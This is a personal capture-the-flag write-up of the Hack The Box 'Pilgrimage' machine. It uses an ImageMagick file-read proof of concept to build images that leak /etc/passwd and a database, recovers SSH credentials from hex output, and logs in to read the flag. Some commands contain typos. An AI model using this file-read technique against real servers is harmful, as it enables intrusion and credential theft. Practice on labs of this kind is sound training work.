[CTF]Hack The Box : pilgrimage
Original posting date : 7/11/2023
[CTF]Hack The Box : Pilgrimage/
Simulated Penetration Test(?)
Finally got around to starting
the Hack The Box
penetration testing (CTF) challenges
I’ve been putting off.
From now on,
I’ll be solving about one challenge a day —
or maybe one a week — in whatever time
I have left after working on my Unity
fan-made game and studying Japanese.
Screenshot 1. the first challenge.
When I first created my account,
there were so many challenges to choose from.
(Over 80% of them are paid ones 😭)
Among all of them,
I decided to start with the very first training
challenge in the Academy section.
“
Pilgrimage
“
I decided to try solving the challenge.
Screenshot.2 openvpn· · ·
This CTF system is quite unique —
you have to download a dedicated OpenVPN file,
connect through it,
and then you can start solving the challenge.
I forgot to take a screenshot at first,
but you need to download the file first and
then type the command in the terminal.
1 | openvpn lab_{Your User Nickname}.ovpn |
Type it in and press Enter.
Screenshot.3 nmap Scan the Net Server(?)
Then copy the target machine’s
IP address from Screenshot 1 and scan it with
nmap using the command below.
1 | nmap -sV -sC {PilgrimageFingerprint Machine IP} |
Screenshot.4 nmap Scan Netservers
Screenshot.5 Host File
Once the nmap scan is complete,
use a text editing command.
As shown in Screenshot6,
you need to add the machine’s
IP and pilgrimage.htb (found via an nmap scan)
to your hosts file and then save it.
This is because a direct connection will not work.
Screenshot.7 pilgrimage.htb
This is a screenshot of the
pilgrimage.htb website.
The target site in this text is
one where you can upload images.
Screenshot.8 pilgrimage.htb
Go to the login page
Screenshot.9 Attempt to log in(?)
Let’s try to log in.
Screenshot.10 Login Attempt 2(?)
When I tried to connect, it failed of course.
This is because the SQL user
account was never on
the list to begin with,
so the connection cannot be established.
Screenshot.12 Test Image Upload
Going back to the image file
Screenshot.13 Test Image Upload 2
Screenshot.14 Meowニャー
Screenshot.15 Test Image Upload 3
Screenshot.16 Check the uploaded
image after user registration1
I forgot to take a screenshot
of the user registration,
so I’ll have to explain it in
a text post instead.
- Access the ‘Register’ page.
- Enter your preferred nickname
and password as prompted by the UI.
Screenshot.17 Check the uploaded image
after user registration2
Screenshot.18 Check the uploaded image
after user registration3
Screenshot.19 Check the uploaded image
after user registration 4
Screenshot.20 Check the uploaded image
after user registration 5
A new image has been uploaded and a
new link has been generated.
Screenshot.21 Confirming the uploaded
image after user registration 6
If you go into the Dashboard,
you can see that it has
also been uploaded to the database.
Screenshot.22 command window again
Returning to the command prompt
1 | git clone https://github.com/Sybil-Scan/imagegick-lfi-poc.git |
Run the command as shown above,
then download a tool for decoding the image code.
Screenshot.23 Downloaded Image
Code Decryption Tool
Once the image-decoding tool has finished downloading,
change to the directory where you saved it.
Screenshot.24 Downloaded Image
Code Decryption Tool
Screenshot.25 Check the inside of the directory
Screenshot.26 Check the applicable
tool guidelines
Check the files in the directory, then review the tool’s guidelines.
1 | python3 generate.py |
Screenshot.27 appropriate tool git site
Access the tool’s Git repository,
execute the command(s),
and generate the exploit file.
Screenshot.28 Create an Exploit File
1 | python3 generate.py -f "/etc/passwd" -o exploit.png |
Screenshot.29 Verifying the Create Exploit File
Ensure the exploit file
has been generated correctly.
Screenshot.30 Upload the Exploit file.
Now upload the exploit file you generated.
Screenshot.31 Newly created link
Screenshot.32 Link Image
Right‑click the uploaded
image link and inspect it.
Screenshot.33 Re-download
1 | wget http://pitgrimage.htb/shrunk/{Uploaded Image}.png |
Download the uploaded image again to my device.
Screenshot.34 Check internal code
Using the command shown below,
inspect the internal code of
the image file you re-downloaded.
1 | indentify -verbose result.png |
Screenshot.35 Check internal code 2
Screenshot.36 Access the Hexcode
Decoder CyberChef site
To decode the code contained in
the image file from screenshot 33 and
achieve the desired outcome,
begin by accessing the CyberChef website.
Screenshot.37 Hex code decryption
With ‘From Hex’ selected,
use the hex code obtained from
the image to attempt decoding the content.
Screenshot.38 Hex code decryption 2
After decoding the hex code,
the following results were produced.
Proceed with the tasks based on these results.
Screenshot.39 Attempt again.
Some clues have become apparent.
Using the method described above,
adjust some of the commands and recreate it.
1 | python3 generate.py -f "/ver/www/pilgrimage.htb" -o exploit.png |
Screenshot.40 Attempt again 2
Screenshot.41 Attempt again 3
Screenshot.42 Attempt again 4
1 | python3 generate.py -f "/ver/db/pilgrimage" -o exploit.png |
Screenshot.43 Attempt again 5
Screenshot.44 Attempt again 6
Screenshot.45 Attempt again 7
Screenshot.46 Attempt again 8
Screenshot.48 Attempt again 10
Screenshot.49 Attempt again 11
Screenshot.50 Attempt again 12
Screenshot.51 Hexcode disaster reading
Retry screenshots 37–38,
then decode
the newly acquired hex code again.
Screenshot.52 Copy part of the hex code
Once you’ve re-decoded it,
the machine site’s
SSH account becomes visible copy it now,
as you’ll be attempting to connect via SSH.
1 | emity : abigchonkyboi123 |
Before attempting SSH,
return to the machine that matches the fingerprint,
combine it with the appropriate IP,
then construct the command below and try to connect via SSH.
1 | emity@{Corresponding fingerprint machine IP} |
It also asks you to enter a password,
so try accessing it using the hex code you extracted.
1 | abigchonkyboi123 |
Screenshot.53 Fingerprint machine SSH account
SSH login successful.
Screenshot.54 Fingerprint machine SSH directory
Now that we’ve successfully breached
that fingerprint server,
check whether the flag is present.
There’s a user.
txt file that looks suspicious,
so have a look.
Screenshot.55 Check In user.txt
1 | cat user.txt |
I checked, and sure enough the flag appeared!
Screenshot.56 Flag Input
Enter the flag you obtained,
then click the ‘Submit Flag’ button.
Screenshot.57 clear!
Success.